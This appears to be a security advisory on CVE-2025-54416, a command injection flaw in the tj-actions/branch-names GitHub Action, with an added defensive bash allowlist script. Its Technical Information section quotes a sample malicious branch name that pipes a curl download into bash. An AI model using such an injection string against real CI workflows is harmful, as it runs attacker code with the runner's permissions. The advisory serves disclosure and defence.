Introduction
A single malicious branch name can compromise an entire CI/CD pipeline if it is not properly sanitized. That is exactly what happened with tj-actions/branch-names, a popular GitHub Action used to extract branch and tag names in automated workflows. This vulnerability, tracked as CVE-2025-54416 and present in versions 8.2.1 and below, enables arbitrary command execution in any workflow that consumes the action's output in a shell command. With a CVSS score of 9.1, the risk is significant for any project relying on this action in collaborative or open environments.
About tj-actions/branch-names
tj-actions is a GitHub organization that maintains a suite of workflow automation tools for GitHub Actions. The branch-names action is widely used in open-source and enterprise CI/CD pipelines to programmatically retrieve branch and tag names across all GitHub event types. Its popularity stems from its flexibility and ease of integration, making it a common dependency in many DevOps workflows.
Technical Information
CVE-2025-54416 is a command injection vulnerability resulting from improper input sanitization and unescaped output in the tj-actions/branch-names GitHub Action. The flaw occurs when branch or tag names containing shell metacharacters are not properly neutralized before being passed to downstream workflow steps. Attackers can exploit this by crafting branch or tag names that inject arbitrary shell commands into the workflow execution context.
The vulnerability specifically affects how the action exposes branch and tag names via its outputs. If a workflow step uses these outputs directly in a shell command, a maliciously crafted branch name can break out of the expected context and execute arbitrary commands. For example, a branch name such as:
"test") ${IFS} && {curl -sSfL gist.githubusercontent.com/[MALICIOUS-CONTENT].sh } | bash && echo "foo"
When this branch name is processed by the vulnerable action and used in a shell context, the injected commands are executed with the permissions of the workflow runner. The root cause is the lack of proper escaping and sanitization of user-controlled input, which is classified as CWE-77 (Improper Neutralization of Special Elements used in a Command). The issue was addressed in version 9.0.0, which implements stricter output escaping and input validation.
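The unsafe and the hardened consumption patterns described above, as an added example that is not part of the advisory or of tj-actions' own code: a bash allowlist check for ref names, and a simulation of the safe environment-variable pattern. The output name `current_branch` in the comments is assumed, not taken from the advisory.

```shell
#!/usr/bin/env bash
# Added example, not code from the advisory or from tj-actions: a defensive
# allowlist check for branch/tag names, and the safe way to consume an action
# output in a run: step. Assumes bash; the output name `current_branch` in the
# comments below is assumed, not taken from the advisory.

# Accept only names made of letters, digits, '.', '_', '-' and '/'. Quotes,
# parentheses, '$', '|', '&', ';', backticks and whitespace are all rejected,
# so a name can never carry shell syntax into a later step.
is_safe_ref_name() {
  case "$1" in
    "")                  return 1 ;;  # empty
    *[!A-Za-z0-9._/-]*)  return 1 ;;  # any character outside the allowlist
    -*)                  return 1 ;;  # would be parsed as an option by git/tools
    *)                   return 0 ;;
  esac
}

# UNSAFE pattern (the one CVE-2025-54416 abuses): ${{ }} is expanded by the
# Actions expression engine before bash ever sees the line, so metacharacters
# in the branch name become part of the script:
#   run: echo "Deploying ${{ steps.branch.outputs.current_branch }}"
#
# SAFE pattern: pass the value through an environment variable and quote it.
# Bash then treats the name as data, whatever characters it contains:
#   env:
#     BRANCH: ${{ steps.branch.outputs.current_branch }}
#   run: echo "Deploying $BRANCH"

# Simulates the safe step: the name is printed verbatim, never re-parsed.
describe_branch() {
  printf 'Deploying %s\n' "$1"
}

# Gate a step on the allowlist and log rejections (%s keeps the value inert).
check_and_describe() {
  if ! is_safe_ref_name "$1"; then
    printf 'rejected ref name: %s\n' "$1" >&2
    return 1
  fi
  describe_branch "$1"
}

# Demo on constructed inputs; the second is a deliberately malformed name.
for name in 'feature/login-fix' 'test") echo injected #'; do
  check_and_describe "$name" || true
done
```

The rejection log line is a useful detection signal in its own right: a pipeline that suddenly starts rejecting ref names is worth a look.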
Affected Systems and Versions
The vulnerability affects tj-actions/branch-names versions 8.2.1 and below. Any workflow that uses these versions and consumes branch or tag names as shell variables or command arguments is at risk, especially in repositories that accept contributions from untrusted users or external collaborators. The issue is fixed in version 9.0.0 and later.
Vendor Security History
tj-actions has responded to this vulnerability by releasing a fix in version 9.0.0 and publishing a detailed security advisory. No prior similar vulnerabilities were found in the public record for this action. The vendor's patch response was prompt following disclosure.